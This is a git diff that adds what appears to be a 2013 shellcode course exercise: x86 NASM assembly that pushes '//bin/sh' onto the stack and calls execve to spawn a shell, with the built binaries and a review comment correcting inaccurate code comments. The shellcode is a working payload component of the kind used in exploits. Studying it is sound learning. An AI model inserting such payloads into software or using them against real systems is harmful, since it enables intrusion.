diff --git a/exam1/execve-stack b/exam1/execve-stack
new file mode 100755
index 0000000..9731f40
Binary files /dev/null and b/exam1/execve-stack differ
diff --git a/exam1/execve-stack.nasm b/exam1/execve-stack.nasm
new file mode 100644
index 0000000..35717d1
--- /dev/null
+++ b/exam1/execve-stack.nasm
@@ -0,0 +1,57 @@
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+ ;
+ ; =============================== EXECVE =====================================
+ ;
+ ; Now as we forwarded sockfd to a client, we can spawn shell.
+ ; Prepare the path, in little-endian, using the Python
+ ; >>> '//bin/sh'[::-1].encode('hex')
+ ; '68732f6e69622f2f'
+ ;
+ ; int execve(const char *filename, char *const argv[], char *const envp[]);
+ ; EAX EBX, ECX, EDX
+ ; 11 '//bin/sh' PTR to EBX NULL
+ ;
+ ;
+
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
+
+ ; === EXIT(0) ===
+ ; void _exit(int status);
+ ; /usr/include/asm/unistd_32.h:#define __NR_exit 1
+ xor eax, eax ; EAX = 0x000000
+ mov al, 1 ; EAX = 0x000001 1: exit syscall
+ xor ebx, ebx ; EBX = 0x000000 0: success status
+ int 0x80
+
+
+;section .data
diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o
new file mode 100644
index 0000000..0992e7a
Binary files /dev/null and b/exam1/execve-stack.o differ
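Review bot: The header comment `; Now as we forwarded sockfd to a client, we can spawn shell.` in the EXECVE block of execve-stack.nasm does not describe this file, which contains no socket handling at all; it reads as carried over from a different exercise and will mislead anyone studying the listing on its own. Replace it with a line that states what this unit does by itself, e.g. `; Build the '//bin/sh' path plus the argv and envp arrays on the stack, then invoke execve (syscall 11).` Two further comments are imprecise: `; NULL termination of a stack` after the second `push edx` is the NULL terminator of the argv array, not of the stack, so `; NULL terminator of the argv array` is the accurate wording. The `; === EXIT(0) ===` block is only reached if execve returns, which happens solely on failure, so `; 0: success status` is misleading there; `; reached only when execve fails, so status 0 hides the error` would document the actual control flow.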